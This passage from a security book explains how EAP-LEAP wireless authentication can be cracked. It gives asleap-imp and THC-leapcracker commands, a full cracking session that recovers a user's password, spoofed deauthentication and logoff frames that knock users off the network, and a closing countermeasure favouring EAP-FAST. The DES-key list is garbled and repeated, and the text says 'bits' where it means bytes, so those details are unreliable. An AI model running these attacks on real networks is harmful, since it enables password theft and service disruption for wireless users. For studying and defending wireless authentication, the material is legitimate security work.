| ||
802.1x is an IEEE standard for port-based (well, we would rather say interface-based ) enduser authentication on LANs. While it supports (and was initially designed for) Ethernet, the main current use of 802.1x is wireless users' authentication as a part of the wireless security scheme provided by the 802.11i security standard. The 802.1x authentication chain consists of three elements:
Supplicant An end- user station, often a laptop, that runs 802.1x client software.
Authenticator A switch, a wireless gateway, or an access point to which the authenticating users connect. It must be configured to support 802.1x on the involved interfaces with commands like aaa authentication dot1x default group radius (global configuration) and dot1x port control auto (switch interface).
Authentication server A RADIUS server to which authenticators forward end users' authentication requests for verification and authentication decision.
The Extensible Authentication Protocol (EAP) is used by all three 802.1x component devices to communicate with each other. It is extensible since many different EAP types exist for all kinds of authentication plansfor example, employing SIM cards, tokens, certificates, and more traditional passwords. Here we are interested only in Cisco- related protocols and products, thus the security weaknesses of EAP-LEAP are the target of the discussion.
EAP-LEAP is a Cisco proprietary protocol, with its implementation code open for supplicant software and RADIUS servers, but not for authenticators. Thus, when using EAP-LEAP, deployment of Catalyst switches or Cisco Aironet access points is necessary. EAP-LEAP is also a very common security protocol, since it appeared in the early days of 802.1x, when its only competitor was EAP-MD5, a first and highly vulnerable EAP version. You can still encounter a lot of wireless LANs using EAP-LEAP when wardriving, and you'll see companies planning to install new wireless networks with EAP-LEAPbased authentication, despite the development of a more secure Cisco Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling (EAP-FAST) as well as other, more modern, nonproprietary EAP types. It is remarkable that EAP-LEAP was the first EAP type that started to support generation and distribution of dynamic Wired Equivalent Privacy (WEP) keys, which together with a popularity of Cisco Aironet wireless equipment, promoted the spread of this protocol in wireless networking. Nowadays, dynamic Temporal Key Integrity Protocol (TKIP) keys can be used with EAP-LEAP instead of insecure WEP.
EAP-LEAP provides mutual authentication via a shared secret, which is a password known to both connecting user and RADIUS server. Of course, bad passwords can fall to dictionary attacks. In fact, the first tool written for attacking EAP-LEAP was a simple Perl dictionary attack utility called LeapCrack, which is a wrapper for the ancontrol BSD command. However, an easy-to-guess password is a user or administrator's fault, not the authentication protocol's fault. If, however, we could deduce at least a part of a password by cryptanalysis, so that a shorter word becomes available for further dictionary or bruteforce attacks, it becomes an entirely different matter. This is exactly the kind of exploitation we are going to discuss here.
Attack |
|
The root of the problem is EAP-LEAP using Microsoft Challenge Handshake Authentication Protocol v2 (MS-CHAPv2) in the clear to authenticate users. Thus, several known MS-CHAPv2 flaws are inherited, including sending plaintext usernames (half of the guesswork gone), weak challenge/response Data Encryption Standard (DES) key selection, and an absence of salt in the stored NT hashes. All these flaws can be exploited to make cracking EAP-LEAP shared keys a much easier task. Let's have a look at challenge/response process first.
In the beginning, the authenticator issues a random 8-bit nonce to the supplicant. Then the supplicant uses a 16-byte MD4 hash of a shared secret to generate three DES keys:
1. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 +1. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 + \0 \0 \0 \0 \01. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 + \0 \0 \0 \0 \01. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 + \0 \0 \0 \0 \01. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 + \0 \0 \0 \0 \01. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 + \0 \0 \0 \0 \0
After that, each produced DES key is employed to encrypt the challenge nonce, generating 8 bytes of output per key; then a 24-byte response is sent back to the authenticator, which then issues a success or failure frame to the supplicant after consulting the RADIUS server.
The first problem here is that the third DES key is weak. The five nulls mentioned are present in every challenge/response. This leaves us a DES key size of 16 bits only. Cracking a 16-bit DES knowing the plaintext challenge is easyin fact, it can be done within a second. This helps to calculate two out of eight MD4 hash bytes; as a result, only six are left. They can be cracked using a dictionary attack against a large prebuilt MD4 hash table. Considering the speed of the MD4 cipher, such a table would not take a lot of time to generate.
To summarize, here is an actual attack:
Build a large list of MD4- hashed passwords.
Sniff out EAP-LEAP challenge/response frames .
Obtain challenge, response, and username from the frames.
Use the response to calculate the last two bits of the MD hash.
Launch the dictionary attack against the remaining six bits of the hash, using the list from Step 1.
A few tools can be used to implement this attacknamely Joshua Wright's asleap-imp , THC-leapcrack , and leap by DaBubble, Bishop, and Evol. Asleap-imp was the first tool to be described to the general public (at DEFCON 11) and is very mature. Thus, we will center on this particular piece of software here. Asleap-imp consists of two utilities: Genkeys generates a list of MD4 hashes from a supplied password list. This list is created as a " password ˆ˜Tabˆ˜ hash " table and is useful for dictionary-type attacks against any MD4 password file. The second utility, asleap , implements the practical attack itself in the following way:
The data is taken from a wireless interface in the RFMON (radio frequency monitoring) mode or a pcap format dump file, such as Kismet or Ettercap dump:
arhontus / # ./asleap -D arhontus / # ./asleap -i <interface name> -o -t 10 -v
or
arhontus# ./asleap -r <pcap dumpfile> -v
EAP-LEAP challenge/response frames are flagged out.
The last two bits of the MD4 hash are calculated using the third weak DES key.
Cracked and remaining bits are compared against the password:hash table generated by genkeys . Found passwords are reported .
Since waiting for legitimate EAP-LEAP logins can take plenty of time, asleap-imp can knock the authenticated wireless users offline by scanning through all 802.11 channels, identifying connected clients , and sending spoofed EAP-LEAP logoff frames to them. This is followed by spoofed deauthentication frames to drop clients from wireless LANs (WLAN) and triggering a new challenge/response exchange. The exchange is dumped as a pcap format file to allow further password cracking on a more powerful machine. An option to specify this "active attack" is -a ; AirJack drivers are required for spoofed EAP-LEAP and deauthentication frames injection. A live example of attack using asleap-imp against a Kismet dump file is as follows :
arhontus / # ./genkeys -r worldlist-all -f hashtable -n index.idxgenkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com> Generating hashes for passwords (this may take some time) ...Done. 1614816 hashes written in 3.76 seconds: 429699.99 hashes/second Starting sort (be patient) ...Done. Completed sort in 18363792 compares. Creating index file (almost finished) ...Done. arhontus / #./asleap -r eap-leap-containing-dump -v -f hashtable -n index.idxarhontus / # ./asleap -r /eap-dumps -v -f hashtable -n index.idx asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> Using the passive attack method. Captured LEAP challenge: 0802 7500 0040 9641 b67f 0040 9645 a06c ..u..@.A...@.E.l 0040 9645 a06c a0c5 aaaa 0300 0000 888e .@.E.l.......... 0100 001f 0100 001f 1101 0008 223c 6e74 ............"<nt 1050 1e46 4543 454d 415c 625f 636c 6179 .P.FCEM_user 746f to 6e n Captured LEAP response: 0801 a200 0040 9645 a06c 0040 9640 d983 .....@.E.l.@.@.. 0040 9645 a06c 309b aaaa 0300 00f8 888e .@.E.l0......... 0100 002f 0200 002f 1101 0018 4929 d530 .../.../....I).0 41d2 fecc 0de4 968a 9283 92c9 0a99 dcd0 A............... 38e6 1e67 494d 4543 454d 415c 685f 7465 8..gIMCEM_us 7261 ra 6e n Captured LEAP auth success: 0802 7500 0040 9640 d983 0040 9645 a06c ..u..@.@...@.E.l 0040 9645 a06c 6007 aaaa 0300 0000 888e .@.E.l'......... 0100 0004 0300 0004 ........ Captured LEAP exchange information: username: ECEMA_user1 challenge: 223c6e7410501e46 response: 4929d53041d2fecc0de4968a928392c90a99dcd038e61e67 Attempting to recover last 2 of hash. Could not recover last 2 bytes of hash from the challenge/response. Sorry it didn't work out. Captured LEAP challenge: 0802 7500 0040 9641 9bce 0040 9647 b8bf ..u..@.A...@.G.. 0040 9647 b8bf 90ca aaaa 0300 0000 888e .@.G............ 0100 001f 0100 001f 1101 0008 7971 0775 ............yq.u f011 de15 4543 454d 415c 765f 6d63 656e ....ECM_user 7465 te 65 e Captured LEAP response: 0801 a200 0040 9647 b8bf 0040 9641 9bce .....@.G...@.A.. 0040 9647 b8bf 00b7 aaaa 0300 00f8 888e .@.G............ 0100 0031 0200 0031 1101 0018 4f4c eef0 ...1...1....OL.. 23a6 ac29 d964 fe95 0014 2d99 74b4 9277 #..).d....-.t..w c0ae 07d3 494d 4543 454d 415c 765f 6d63 ....IMCEM_us 656e 7465 65 entee Captured LEAP auth success: 0802 7500 0040 9641 9bce 0040 9647 b8bf ..u..@.A...@.G.. 0040 9647 b8bf d0ca aaaa 0300 0000 888e .@.G............ 0100 0004 0300 0004 ........ Captured LEAP exchange information: username: ECM_user challenge: 79710775f011de15 response: 4f4ceef023a6ac29d964fe9500142d9974b49277c0ae07d3 Attempting to recover last 2 of hash. hash bytes: 7a6b Starting dictionary lookups. Found a matching password! w00t! <password has been skipped> Reached EOF on pcapfile.
Note that asleap-imp can be installed and utilized on both Linux and Windows . Both genkeys and asleap can be compiled on Windows platforms using the WinPcap developer's pack that can be downloaded from http://www.winpcap.org/. To scan for vulnerable WLANs with asleap on Windows, you will need AiroPeek NX drivers (try out the demo version of AiroPeek NX from http://www.wildpackets.com/products/demos/apwnx ). You can also parse AiroPeek.apc dumps with asleap using the -r flag.
To compile asleap-imp on Windows, do the following:
Get and set up WinPcap.
Obtain and install cygwin with the win32api package and development tools.
Get and unzip the WinPcap developer's pack.
Edit the makefile.cygwin file, changing the WPDPACK line to correspond to the path where you extracted the WinPcap developer's pack.
Execute make -f makefile.cygwin to build the tools. If you want to copy the asleap.exe and genkeys.exe files to another Windows box that doesn't have cygwin installed, you'll also need to copy the cygwin1.dll and cygcrypt-0.dll files with them.
Note | Precompiled windows binaries are also available at Sourceforge ( http://www.sourceforge.net/ ). |
Keep in mind that it won't be possible to execute an active attack against EAP-LEAP-supporting WLANs from Windows, since AirJack drivers are required. Unfortunately, AirJack is no longer maintained by Abaddon. Fortunately, we picked up the active maintenance and released a version of AirJack for 2.6.x Linux kernels that you can download at http://www.wi-foo.com/soft/attack/airjack26-0.1a.tar.bz2.
THC-leapcracker is similar in functionality to asleap-imp , but with a few twists . For example, its getleap utility can spoof the access point LEAP response, so the targets are fed the attacker-defined nonce to calculate the challenge response. A possible advantage of this functionality is that the nonce is identical for all wireless users, which means the attacker can use a single precompiled password/hash table for all targets. THC-leapcracker also has its own wordlist generator ( wordgen ) and a utility to do mass user deauthentication. The use of its main utility, leap-cracker , is self-explanatory:
arhontus / # ./leap-cracker NTChallengeResponse Attack Tool written by DeX7er '03 (dexter@thc.org) Ver.0.1
Note | You can always get the latest version and other cool stuff at http://www.thc.org. |
You can use THC-leapcracker to reverse NtChallengeResponse hashes to cleartext passwordsfor example, sniffed Cisco LEAP Passwords. Run the tool with the -h flag for usage options:
This code is Proof of Concept (POC) and comes without any warranty, so use it on your own risk. It is free software; you can redistribute it and/or modify it un- der the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the license, or (at your option) any later version. Usage: ./leap-cracker [-l <Password length>] [-a <Alphabet string>] [-w <Alphabet string>] [-b <filename>] [-f <filename>] [-u <filename>] [-t <NtChallengeResponse>][-c <challenge>] [-p refix][-v] [-o] -l password length (max. 15) -a alphabet (the characters that should be used to build the password) -w alphabet input with wildcars: a-z; A-Z; 0-9 -f use a wordlist file for password cracking instead of the alphabet generator(Pwd length max. 15 characters). (without -l, -a or -f the default filename 'wordlist.txt' is used) -b bruteforce attack against pre-compiled binary password file (generated with passwords_convert2bin) -u userlist (ASCII Format: USERNAME CHALLENGE NTCHALLENGERESPONSE) -t sniffed NT Challenge Response Hash (24 hexdigits) following formats are supported: "FFFF...",</quote>FF FF</quote>...,"FF-FF...","ffff...","ff ff"..., "ff-ff...","ff:ff..." (e.g. cut'n paste from ethereal (all blanks, '-' and ':' are ignored) -c challenge. The 8 byte random value that is used to calculate the NT Challenge Response. Input format is the same like for the -t option. Default value, if not set, is 'deaddeaddeaddead'. -p prefix for password generation (password = [prefix]+[generated combinations] -v check number of combinations, ask before starting brute force attack and verbose output -o output to stdout (show all generated pwd combinations (only for debugging)) max. number of combinations = 18446744073709551615 Hint: The way in which order the passwords are generated, depends on the order of your input. The algorithm is a number system algorithm, so your alphabet characters are the number system members. E.g.: -a 01 -l 3 means the passwords are generated like this: 000,001,010,011,100,... -a abc -l 3 means the passwords are generated like this: aaa,aab,aac,aba,abb,... -a cba -l 3 means the passwords are generated like this: ccc,ccb,cca,cbc,cbb,... Example for Password = 'awctlr' with alphabet generator: ./leap-cracker -l 6 -a abcdefghijklmnopqrstuvwxyz -t 34f208583cda2e6674749fa08fff18663fb75c01c6537082 -c 102db5df085d3041 -v Example for Password = 'cisco123' with a ASCII wordlist file 'wordlist.txt': ./leap-cracker -f wordlist.txt -t \ 1ef803cbfb06a09867f5ebf56b04f7a036954f13b81896cc -c 102db5df085d3041 Example for an ASCII wordlist file 'wordlist.txt' and userlist file 'userlist.txt': ./leap-cracker -f wordlist.txt -u userlist.txt Example for a pre-compiled passwordlist file 'wordlist.bin' and a userlist file 'userlist.txt', using the default challenge ./leap-cracker -b wordlist.bin -u userlist.txt Example for a userlist compared with generated passwords starting with cisco+[nnn] where nnn are numbers from 0-9 ./leap-cracker -u userlist.txt -p cisco -l 3 -w 0-9
THC-leapcracker requires AirJack drivers to run active attacks, and without AirJack being installed, both get-leap and all-deauth tools will not compile.
Both asleap-imp and THC-leapcracker can be used to attack wired switched networks just as well. Obviously, you won't be able to deauthenticate Ethernet users, but sending EAP-LEAP logoff frames is still a valid option, as well as a variety of efficient DoS attacks on LANs, such as ARP-based ones.
Countermeasure | The most obvious and easy countermeasure would be to select strong user passwords. However, a limited size of the shared secret when 2 bytes are subtracted means that even good passwords have a chance of failing to bruteforce attacks. Thus, a recommended solution is not to use EAP-LEAP at all. Cisco has developed a novel nonproprietary EAP type to replace EAP-LEAP, namely EAP-FAST. So, if you are keen on implementing a Cisco-specific user authentication solution, use EAP-FAST instead. EAP-FAST is not susceptible to the attack against EAP-LEAP we have outlined in this section. EAP-FAST is described in detail in the IETF informational draft at http://www.ietf.org/internet-drafts/draft-cam-winget-eap-fast-02.txt. |
EAP-FAST provides a seamless migration from EAP-LEAP, does not require digital certificates and Public Key Infrastructure (PKI) support on end-user hosts , and is easily integrated with both Microsoft Active Directory and Lightweight Directory Access Protocol (LDAP). One-time passwords can also be used. Visit http://www.cisco.com/warp/public/cc/pd/witc/ao1200ap/prodlit/eapfs_qa.htm to find more about this security protocol.
| ||